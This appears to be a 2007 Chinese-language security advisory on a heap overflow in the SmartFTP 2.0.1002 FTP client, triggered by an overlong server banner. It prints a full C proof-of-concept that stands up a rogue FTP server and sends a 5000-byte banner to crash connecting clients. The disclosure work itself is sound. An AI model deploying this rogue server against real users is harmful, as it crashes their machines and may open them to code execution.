发布日期：2007-02-05
更新日期：2007-02-06

受影响系统：

SmartFTP SmartFTP 2.0.1002

描述：

---

BUGTRAQ  ID: 22390

SmartFTP是一款FTP 客户端工具，使用与资源管理器类似的操作界面。

SmartFTP在处理FTP服务器的banner回复时存在堆溢出漏洞，远程恶意FTP服务器可能利用此漏洞控制用户机器。

如果服务器向客户端返回了超过4000字节的超长Banner回复的话就可能触发这个溢出，导致执行任意指令。

<*来源：Marsu Pilami
  
  链接：http://secunia.com/advisories/24051/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/***************************************************************************
*              SmartFTP Client v 2.0.1002 Heap Overflow DoS                *
*                                                                          *
*                                                                          *
* There is remote heap overflow in SmartFTP. When the app receives a long  *
* banner (5000 char) the heap is smashed, leading to DoS and to code       *
* execution.                                                               *
*                                                                          *
* There are also two buffer overflow in the fields Address and Login.      *
* I've reported this to Secunia but it seems they didn't think it was dan- *
* gerous cause they didn't publish anything about. However a simple drag'n *
* drop could compromise your system...                                     *
*                                                                          *
* Have Fun!                                                                *
*                                                                          *
* Coded by Marsu <Marsupilamipowa@hotmail.fr>                              *
***************************************************************************/



#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{

    char evilbuff[5000];
    sockaddr_in sin;
    int server,client;
    WSADATA wsaData;
    WSAStartup(MAKEWORD(1,1), &wsaData);

    server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    sin.sin_family = PF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_ANY);
    sin.sin_port = htons( 21 );
    bind(server,(SOCKADDR*)&sin,sizeof(sin));
    printf("[*] Listening on port 21...\n");
    listen(server,5);
    printf("[*] Waiting for client ...\n");
    client=accept(server,NULL,NULL);
    printf("[+] Client connected\n");

    memset(evilbuff,'A',5000);
    memcpy(evilbuff,"220 ",4);
    memcpy(evilbuff+4997,"\r\n\0",3);

    if (send(client,evilbuff,strlen(evilbuff),0)==-1)
    {
        printf("[-] Error in send!\n");
        exit(-1);
    }
    printf("[+] Data sent\n");

    Sleep(1500);

    if (send(client,"boom?",5,0)==-1)
        printf("[+] Crashed? Crashed!\n");
    else
        printf("[-] Exploit failed!\n");

    return 0;
}

建议：

---

厂商补丁：

SmartFTP
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.smartftp.com/

浏览次数：2813
严重程度：0（网友投票）